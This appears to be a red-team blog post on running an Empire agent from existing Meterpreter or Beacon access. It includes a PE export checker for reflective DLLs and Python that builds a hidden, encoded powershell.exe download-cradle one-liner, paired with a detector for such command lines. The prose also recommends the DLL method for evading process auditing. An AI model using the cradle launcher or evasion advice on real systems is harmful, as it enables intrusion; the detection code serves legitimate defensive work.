Empire & Tool Diversity: Integration is Key

Launching Empire From Meterpreter/Beacon

The first situation we’ll dive into is executing an Empire agent from access we already have (an existing Meterpreter session or Beacon), or during initial exploitation. We use a variety of tools during our engagements, so this is a use case we run into frequently. Tool diversity can be a major strength for any team.

ReflectiveDLL Method

My favorite method of passing access is Empire’s reflective DLL. There will be an entire post on this aspect of the agent, so for the sake of this post, let’s just state that Empire can generate a Stephen Fewer-style reflective DLL launcher that does not require powershell.exe to run. It uses Lee Christensen’s (@tifkin_) UnmanagedPowerShell project to host the PowerShell runtime inside the injected process instead. Sidenote: if you ever want to make your own reflective DLL, Raphael Mudge has a good post outlining the process. The benefits of this approach:

  • Less impact in process auditing scenarios (no new powershell.exe process is created)
  • Use of the existing user token and proxy settings of the host process (e.g. inject into Internet Explorer for cleaner egress)
  • Harder to recognize with initial detection methods than the “powershell -nop -enc” command-line pattern
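A Fewer-style reflective DLL is only injectable if it carries an exported ReflectiveLoader function, because the injector locates that export by name before handing control to it. The following added example (my own code, not Empire’s or UnmanagedPowerShell’s) is a minimal PE export-table reader that checks a DLL for that export, which is the first thing to verify when a home-built reflective DLL refuses to inject. build_minimal_dll() fabricates a tiny, non-loadable PE32+ image purely so the check can be exercised offline; the name test.dll and the 0x1000/0x400 section layout are arbitrary constructed values.

```python
import struct
from typing import List

# Added example, not Empire's own code. A Fewer-style reflective DLL is
# injectable only if it exports a ReflectiveLoader function; the injector
# resolves that export by name. pe_exports() is a minimal PE32/PE32+ export
# table reader, and build_minimal_dll() fabricates a tiny PE purely so the
# check can be exercised offline (it is not a loadable DLL).


def _rva_to_offset(sections, rva: int) -> int:
    for va, size, raw in sections:
        if va <= rva < va + size:
            return raw + (rva - va)
    raise ValueError(f"RVA {rva:#x} not backed by any section")


def pe_exports(data: bytes) -> List[str]:
    """Return the names in the PE export table (empty if there is none)."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file (missing MZ)")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file (missing PE signature)")
    nsec = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", data, opt)[0]
    # PE32+ (0x20B) data directories start at +112, PE32 (0x10B) at +96;
    # NumberOfRvaAndSizes sits in the 4 bytes just before them.
    dirs_off = opt + (112 if magic == 0x20B else 96)
    num_dirs = struct.unpack_from("<I", data, dirs_off - 4)[0]
    if num_dirs == 0:
        return []
    exp_rva = struct.unpack_from("<I", data, dirs_off)[0]  # directory 0 = exports
    if exp_rva == 0:
        return []
    sections = []
    for i in range(nsec):
        hdr = opt + opt_size + 40 * i
        vsize, va, rawsize, rawptr = struct.unpack_from("<IIII", data, hdr + 8)
        sections.append((va, max(vsize, rawsize), rawptr))
    exp = _rva_to_offset(sections, exp_rva)
    num_names = struct.unpack_from("<I", data, exp + 24)[0]
    names_rva = struct.unpack_from("<I", data, exp + 32)[0]
    names_off = _rva_to_offset(sections, names_rva)
    out = []
    for i in range(num_names):
        name_rva = struct.unpack_from("<I", data, names_off + 4 * i)[0]
        off = _rva_to_offset(sections, name_rva)
        out.append(data[off:data.index(b"\0", off)].decode("ascii"))
    return out


def is_reflective_dll(data: bytes) -> bool:
    """True if some export name contains 'ReflectiveLoader' (this also covers
    the decorated 32-bit stdcall form such as _ReflectiveLoader@4)."""
    return any("ReflectiveLoader" in name for name in pe_exports(data))


def build_minimal_dll(export_names: List[str]) -> bytes:
    """Fabricate a PE32+ image with one section holding an export table.
    Header fields pe_exports() does not read are left zero; the image is
    only for exercising the parser and cannot be loaded."""
    sec_rva, sec_raw = 0x1000, 0x400
    n = len(export_names)
    funcs_rva = sec_rva + 40          # export directory is 40 bytes
    names_rva = funcs_rva + 4 * n
    ords_rva = names_rva + 4 * n
    strings_rva = ords_rva + 2 * n
    strings = b"test.dll\0"
    name_rvas = []
    for name in export_names:
        name_rvas.append(strings_rva + len(strings))
        strings += name.encode("ascii") + b"\0"
    blob = struct.pack("<IIHHIIIIIII", 0, 0, 0, 0, strings_rva, 1, n, n,
                       funcs_rva, names_rva, ords_rva)
    blob += b"".join(struct.pack("<I", sec_rva) for _ in range(n))  # dummy entry RVAs
    blob += b"".join(struct.pack("<I", r) for r in name_rvas)
    blob += b"".join(struct.pack("<H", i) for i in range(n))
    blob += strings
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)   # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 240, 0x2022)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)                   # PE32+ magic
    struct.pack_into("<I", opt, 108, 16)                    # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 112, sec_rva, len(blob))   # export directory
    sec = b".edata\0\0" + struct.pack("<IIIIIIHHI", len(blob), sec_rva, len(blob),
                                       sec_raw, 0, 0, 0, 0, 0x40000040)
    headers = dos + coff + bytes(opt) + sec
    return headers + b"\0" * (sec_raw - len(headers)) + blob


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, "rb") as f:
            print(path, "reflective" if is_reflective_dll(f.read()) else "not reflective")
```

Run it as `python check_rdll.py payload.dll` against the DLL you intend to inject. The substring match rather than an exact name is deliberate: 32-bit builds export the decorated symbol, and injectors in the wild search for the substring for the same reason.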

Launcher Method

If for some reason you are unable to perform a reflective DLL injection (AV, HIDS, exploit scenario, IR team, etc.) and you still want Empire, there is a much easier solution. As you likely know, Empire’s stager is a very small stub of PowerShell code, a souped-up version of the infamous “download cradle”. With this stub we can create a powershell.exe one-liner to execute on any host. The trade-off is that this path spawns a new powershell.exe process with the payload on its command line, so it is the noisier of the two options wherever process creation is being audited.
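The encoding step that turns a stub into a one-liner, and the defender’s inverse of it, as an added example (my own code, not Empire’s stager). CRADLE is a constructed plain download cradle standing in for Empire’s stub, the URL is a placeholder, and the switches on the generated command line are standard powershell.exe flags rather than a claim about Empire’s exact launcher. The second half shows why the page calls this the easier-to-spot option: triage() decodes -EncodedCommand arguments from a constructed set of process-creation command lines and flags the ones that hide a cradle.

```python
import base64
import re
from typing import List, Optional, Tuple

# Added example, not Empire's stager. CRADLE is a constructed plain download
# cradle standing in for Empire's stub (the real stub is more involved), and
# the URL is a placeholder.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5:8080/index.asp')"


def encode_launcher(script: str) -> str:
    """Wrap a script in the classic encoded one-liner. -EncodedCommand takes
    the script as UTF-16LE text, base64 encoded; base64 of UTF-8 will not run."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return f"powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc {b64}"


# powershell.exe accepts -e, -ec, -en, -enc or the full switch name.
_ENC_ARG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
_CRADLE_PATTERN = re.compile(
    r"DownloadString|DownloadData|Invoke-WebRequest|IEX|Invoke-Expression", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the script from a -enc/-EncodedCommand argument, or None if the
    command line carries none (or the argument is not valid UTF-16LE base64)."""
    m = _ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(cmdlines: List[str]) -> List[Tuple[str, str]]:
    """Return (command line, decoded script) for entries whose encoded
    PowerShell payload contains a download cradle. This is exactly the
    command-line evidence the reflective DLL method avoids leaving behind."""
    hits = []
    for cmd in cmdlines:
        script = decode_encoded_command(cmd)
        if script and _CRADLE_PATTERN.search(script):
            hits.append((cmd, script))
    return hits


# Constructed sample of process-creation command lines (not real log data).
SAMPLE_CMDLINES = [
    r"C:\Windows\explorer.exe",
    "powershell.exe -NoProfile -Command Get-Service",
    encode_launcher(CRADLE),
    r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
]


if __name__ == "__main__":
    print(encode_launcher(CRADLE))
    for cmd, script in triage(SAMPLE_CMDLINES):
        print("ENCODED CRADLE:", cmd[:60] + "...")
        print("  decodes to:", script)
```

The regex deliberately does not match -ExecutionPolicy or -Exec, which share the leading letter; a looser `-e\w*` pattern would false-positive on every scripted backup job and is a common mistake in first-draft detections.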

Passing to Metasploit/Cobalt Strike

The inverse of the situations above is also vital to consider. Moving from an existing Empire agent to Beacon or Meterpreter is a common workflow in our post-exploitation scenarios.

Conclusion

This is a small sample of the functionality built into Empire. If you are interested in using it or have questions, check out the documentation at http://www.PowerShellEmpire.com or hit us up in IRC in #psempire.
